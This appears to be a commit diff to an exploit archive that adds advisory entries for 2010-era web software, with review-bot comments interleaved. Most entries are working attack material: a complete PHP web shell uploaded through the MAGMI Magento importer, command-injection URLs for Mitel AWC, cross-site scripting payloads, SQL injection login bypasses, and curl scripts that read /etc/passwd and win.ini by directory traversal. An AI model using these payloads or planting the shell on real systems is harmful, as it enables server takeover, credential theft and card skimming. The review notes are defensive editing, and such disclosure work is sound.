Updated 11_02_2014

Offensive Security 2014-11-02 04:45:04 +00:00
parent 9234afd706
commit 46921ae8d6
13 changed files with 200 additions and 37 deletions


@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
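Review bot: the `date` column in this hunk is not chronological: 35137 carries 2010-12-10 while the entries around it carry 2010-12-21 and 2010-12-22, so either the date or the row position is off. `Scrpti` in the 35123 title looks like a typo carried over from the imported title, and the id sequence skips 35127 to 35129, which is fine if those ids are reserved elsewhere but worth confirming before the CSV is published.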


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/45537/info
Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26
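Review bot: no affected version or version range is recorded for Mitel AWC, while most other BID imports in this commit include an "X is vulnerable; other versions may also be affected" line; add one or state that the source gives none. Both PoC lines place `%26` (an encoded `&`) followed by a command in the `xsl` parameter, which tells the reader that the parameter value reaches a shell unescaped; the remediation to record is validating `xsl` against a fixed set of stylesheet paths and never passing it to a shell, and `%26` inside the `xsl` value of /awcuser/cgi-bin/vcs requests is a simple pattern to alert on in web logs.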


@ -1,48 +1,58 @@
Exploit found date: 10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Security Researcher name: Parvinder Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb <scorpio>
twitter: @parvinderb - scorpio
Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
Magento version: Magento CE - 1.8 older
MAGMI version: v0.7.17a older
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
Download software link:
Magento server: http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks). This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc. Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
Steps to reproduce:
1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and
zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file
has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download
any malware, install rootkits, skim credit card data ..etc.etc.
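Review bot: the two versions of the "Currently tested version" block contradict each other: one reads "Magento CE - 1.8 and newer versions" / "v0.7.17a and greater", the other "Magento CE - 1.8 older" / "v0.7.17a older", and "older" on its own is ambiguous. Confirm which range was actually tested and write it out in full ("1.8 and newer" or "1.8 and older"). The issue is also labelled "File inclusion vulnerability (RFI)" while the steps describe uploading a zipped PHP file through the MAGMI plugin installer, which is an unrestricted file upload, not remote file inclusion; relabel it so the entry is found under the right vulnerability class. Minor: the placeholder host is written `<a magentosite.com>` in step 1 and `<amagentosite.com>` in step 3.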

platforms/php/webapps/35124.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/45522/info
FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected.
http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes
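Review bot: both PoC URLs target /quixplorer/index.php, so the affected code is the QuiXplorer file manager shipped with FreeNAS rather than FreeNAS's own pages; the description should name the component, since a defender searching by it would otherwise miss this entry. The description also does not name the reflected parameters even though the URLs identify them: `lang` in the first request and `order` in the second (the payload sits inside `nan...me`).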


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45523/info
Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0
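Review bot: no affected Openfiler version is recorded, unlike the neighbouring imports in this commit; add one or note that the source gives none. The reflected parameter is `device` on /admin/system.html with `step=2`, which matches the title; the remediation to record is output-encoding the value when it is written back into the page.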

platforms/php/webapps/35126.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45530/info
Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Habari 0.6.5 is affected; other versions may be vulnerable as well.
http://www.example.com/system/admin/dash_status.php?status_data[1]=<script>alert('XSS');</script>
http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script>
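Review bot: the description does not name the vulnerable parameters even though the PoC identifies them: `status_data[]` on dash_status.php and `additem_form` on dash_additem.php. The `status_data[1]` form deserves an explicit mention because it is an array-valued parameter, and input handling that is applied per scalar request value commonly skips array members.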

platforms/php/webapps/35131.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45536/info
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The following example input is available:
Username: anytext' or verified=1#
Password: arbitrary_text
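Review bot: the description says the attacker can "access or modify data", but the only input given is a login pair (`anytext' or verified=1#` with an arbitrary password), which is an authentication bypass; the text should state that the shown input bypasses the login check. The `#` comment terminator indicates a MySQL backend, which is useful for anyone verifying the fix. Remediation to record: a parameterised query for the login lookup rather than string concatenation.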

platforms/php/webapps/35133.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/45539/info
The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks.
http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
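Review bot: the URLs are given at the site root (/show_image_NpAdvCatPG.php and the rest) with no wp-content/plugins/<plugin> prefix, whereas the Accept Signups entry in this same commit includes the full plugin path; confirm whether these paths are relative to the plugin directory and say so. The description's "confirm the existence of local files" and the title's "information disclosure" do not agree on impact: state whether the scripts return file contents or only reveal that a file exists. Remediation to record: resolve `filename` to a real path and reject anything that falls outside the plugin's image directory.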

platforms/php/webapps/35134.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/45541/info
ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected.
<form action="http://www.example.com/modules/content/admin/content.php" method="post" name="main">
<input type="hidden" name="quicksearch_ContentContent" value=&#039;search"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
<input type="hidden" name="filtersel" value="default">
<input type="hidden" name="limitsel" value="15">
</form>
<script>
document.main.submit();
</script>
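Review bot: the hidden input on the second line of the form is not quoted the way the author intended: `&#039;` is a character reference that decodes to a literal apostrophe and does not act as an attribute delimiter, so the `value` attribute is unquoted, ends at the first `>` after `search"`, and the `<script>` that follows is parsed as part of the PoC page itself rather than posted as the `quicksearch_ContentContent` value. As written the file does not demonstrate what the description claims; the attribute quoting needs to be fixed by whoever maintains the entry. The auto-submit `document.main.submit();` relies on `name="main"` on the form, which is present.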


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45545/info
The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi]
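Review bot: no affected version of the Classified component is recorded and `[SQLi]` is left as a placeholder, so the entry documents neither the version range nor anything about how the `name` parameter is used in the query; at minimum add the version and a note that the source provides no concrete input.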

platforms/php/webapps/35136.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45548/info
The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Accept Signups 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
101, 108, 108, 111, 32, 58, 68, 32))</script>
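Review bot: the PoC URL is wrapped across two lines at the comma inside `String.fromCharCode(72,` / `101, 108, ...)`, so the file as imported does not contain a single valid URL; keep it on one line. The reflected parameter is `email` on accept-signups_submit.php, which matches the title, but the description should name it as well.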

platforms/php/webapps/35137.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45550/info
Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
The following example input is available:
Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer");
HTTP query ("Referer" field):
Referer: http://www.example.com/\r\n[second new response]
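Review bot: the quoted vulnerable code `$referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer");` has two problems worth recording beyond the splitting itself: `HTTP_REFERER` is a bare (unquoted) array key, which PHP treats as an undefined constant and falls back to the string with a notice, and redirecting to whatever the client sent in Referer is an open redirect even when the CR/LF shown in the example is stripped. Note also that since PHP 5.1.2 `header()` refuses to emit more than one header per call, so on such a version the splitting part is blocked by the runtime while the open redirect remains; the fix to document is validating the redirect target against an allowlist of local paths instead of echoing Referer.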


@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/45532/info
Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
Calibre 0.7.34 is vulnerable; other versions may also be affected.
<?php
error_reporting(E_ALL);
$url = "http://www.example.com/static/../jquery.simulate.js";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
?>
<?php
error_reporting(E_ALL);
$url = "http://www.example.com/static/../../../../windows/win.ini.";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
?>
http://www.example.com/browse/search?query=<script>alert('waraxe')</script>
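Review bot: the two PHP scripts differ only in `$url`, so the second copy adds nothing; one script taking the path as an argument would be clearer. Neither checks the return value of `curl_exec()`, which is `false` on failure and is echoed as an empty string, so a failed request and an empty file are indistinguishable; test for `$resp === false` and print `curl_error($ch)` before `curl_close($ch)`. The second `$url` ends in `win.ini.` with a trailing dot; if that is intentional, say why, otherwise drop it. The XSS line at the end shows `query` on /browse/search as the reflected parameter but the description does not name it. Remediation to record: normalise the requested path under /static/ and reject anything that resolves outside that directory.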